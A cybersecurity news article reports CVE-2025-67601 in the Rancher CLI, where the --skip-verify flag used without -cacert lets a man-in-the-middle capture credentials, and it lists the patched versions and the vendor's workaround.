Ddos 
For DevOps teams managing Kubernetes clusters at scale, the Rancher CLI is a vital tool. But a new high-severity vulnerability warning from the SUSE Rancher Security team suggests that under specific conditions, the tool might be whispering credentials to attackers when administrators think they are shouting them into a secure void.
The vulnerability, tracked as CVE-2025-67601, carries a high-severity CVSS score of 8.4. It affects the login process when handling self-signed certificates, effectively neutralizing TLS protections even when users believe they are navigating security warnings correctly.
The core of the issue lies in how the Rancher CLI handles the --skip-verify flag during login. Typically used in development environments or internal networks with self-signed certificates, this flag is meant to bypass the initial verification check. However, due to a logic flaw, using this flag without explicitly providing the CA certificate causes the CLI to behave unpredictably.
“A vulnerability has been identified within Rancher Manager, where using self-signed CA certificates and passing the –skip-verify flag to the Rancher CLI login command without also passing the -cacert flag results in the CLI attempting to fetch CA certificates stored in Rancher’s setting cacerts.” — SUSE Rancher Security Team
This fallback behavior creates a critical opening. If an attacker has network-level access between the admin’s workstation and the Rancher Manager, they can intercept the traffic.
The consequences of this flaw are severe. By interfering with the handshake, an attacker can trick the CLI into accepting a malicious Certificate Authority (CA). Once the TLS encryption is stripped or bypassed, the attacker gains visibility into the raw traffic.
“Attackers can also see basic authentication headers in a Man-in-the-Middle due to the lack of TLS enforcement.” — SUSE Rancher Security Team
This means sensitive credentials—the keys to the entire container orchestration environment—could be harvested in cleartext by a lurking adversary.
The maintainers have moved quickly to address the issue. The fix involves strictly removing the CLI’s ability to fetch stored CA certificates during login, forcing users to be explicit about their trust anchors.
Patched Versions:
- v2.13.2
- v2.12.6
- v2.11.10
- v2.10.11
For teams unable to upgrade immediately, the advisory offers a behavioral workaround: Stop relying on defaults.
“If you can’t upgrade to a fixed version, please make sure whenever required, for example when using self-signed certificates, to always explicitly pass CA certificates with the -cacert flag when using the login command.” — SUSE Rancher Security Team
Related Posts:
- SUSE Rancher Security Team Patches Three Vulnerabilities in Rancher Manager
- Microsoft Releases PowerShell Script for UEFI Certificate Update
- Google Cloud Unveils Gemini CLI: Free AI Assistant Brings Gemini 2.5 Pro to Your Terminal
- CVE-2024-58259: DoS Flaw in Rancher Manager Allows Unauthenticated Attackers to Crash Servers
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
